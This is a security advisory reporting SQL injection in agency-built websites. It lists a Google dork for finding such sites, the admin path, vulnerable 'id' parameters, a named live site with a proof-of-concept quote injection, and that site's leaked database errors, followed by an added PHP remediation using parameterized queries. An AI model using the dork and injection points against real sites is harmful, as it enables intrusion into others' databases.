#################################################################################################
# Exploit Title : Created by Vanavi.com Digital Agency Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 05/10/2018
# Vendor Homepage : vanavi.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : intext:''Created by Vanavi.com'' site:cz
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Admin Panel Login Path :
/admin/login.php
# SQL Injection Exploit :
/eng/contact.php?id=[SQL Injection]
/eng/dentistry.php?id=[SQL Injection]
/eng/home.php?id=[SQL Injection]
/eng/implants.php?id=[SQL Injection]
#################################################################################################
# Example Vulnerable Site =>
tichy-zubar.cz/eng/contact.php?id=14%27 => [ Proof of Concept ] => archive.is/0BeT4
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''1''' at line 1
Warning: mysql_query() [function.mysql-query]: Can't connect to local MySQL server through socket
'/var/run/mysqld/mysqld.sock' (2) in /var/home/www/tichy-zubar.cz/www/eng/inc/html.php on line 4
Chyba: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
Ve query: SELECT * FROM new_tichy_zubar_menu_en WHERE id = '14\''
Warning: mysql_query() [function.mysql-query]: A link to the server could not be
established in /var/home/www/tichy-zubar.cz/www/eng/inc/menu.php on line 6
Chyba: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
Ve query: SELECT * FROM new_tichy_zubar_site_map WHERE id_parent =
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
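The query text in the error output above shows the `id` parameter reaching the SQL statement as part of the string, and the database error being printed into the page. The following remediation example is added here and is not code from the vendor or the advisory author; the PDO setup, the SQLite stand-in for MySQL, the function names and the sample rows are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added example, not the vendor's code. In-memory SQLite stands in for MySQL
// so the script runs offline; the two rows are constructed sample data.
ini_set('display_errors', '0'); // driver errors go to the log, not the response
ini_set('log_errors', '1');

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE new_tichy_zubar_menu_en (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO new_tichy_zubar_menu_en VALUES (14, 'Contact'), (15, 'Implants')");

// Assumed "before" pattern (CWE-89): the raw id is pasted into the SQL text,
// so a stray quote changes the statement. Built here only as a string, never run.
function unsafeSql(string $id): string
{
    return "SELECT * FROM new_tichy_zubar_menu_en WHERE id = '" . $id . "'";
}

// Hardened form: accept only a positive integer, then bind it as a parameter
// so the value is never parsed as SQL.
function menuSafe(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller answers 404; no query is issued
    }
    $stmt = $pdo->prepare('SELECT id, title FROM new_tichy_zubar_menu_en WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

echo 'unsafe SQL text: ', unsafeSql("14'"), PHP_EOL;

// "14'" is the request value shown in the advisory; the others are constructed.
foreach (['14', "14'", '15', '99'] as $input) {
    try {
        $row = menuSafe($pdo, $input);
        echo $input, ' => ', $row === null ? 'not found (404)' : $row['title'], PHP_EOL;
    } catch (PDOException $e) {
        error_log('menu lookup failed: ' . $e->getMessage()); // detail stays server-side
        echo $input, ' => generic error page', PHP_EOL;
    }
}
```

The same validate-then-bind handling applies to every `id` parameter listed in the advisory, and the legacy `mysql_query()` calls named in the warnings would need to be replaced with PDO or mysqli prepared statements for it to be possible.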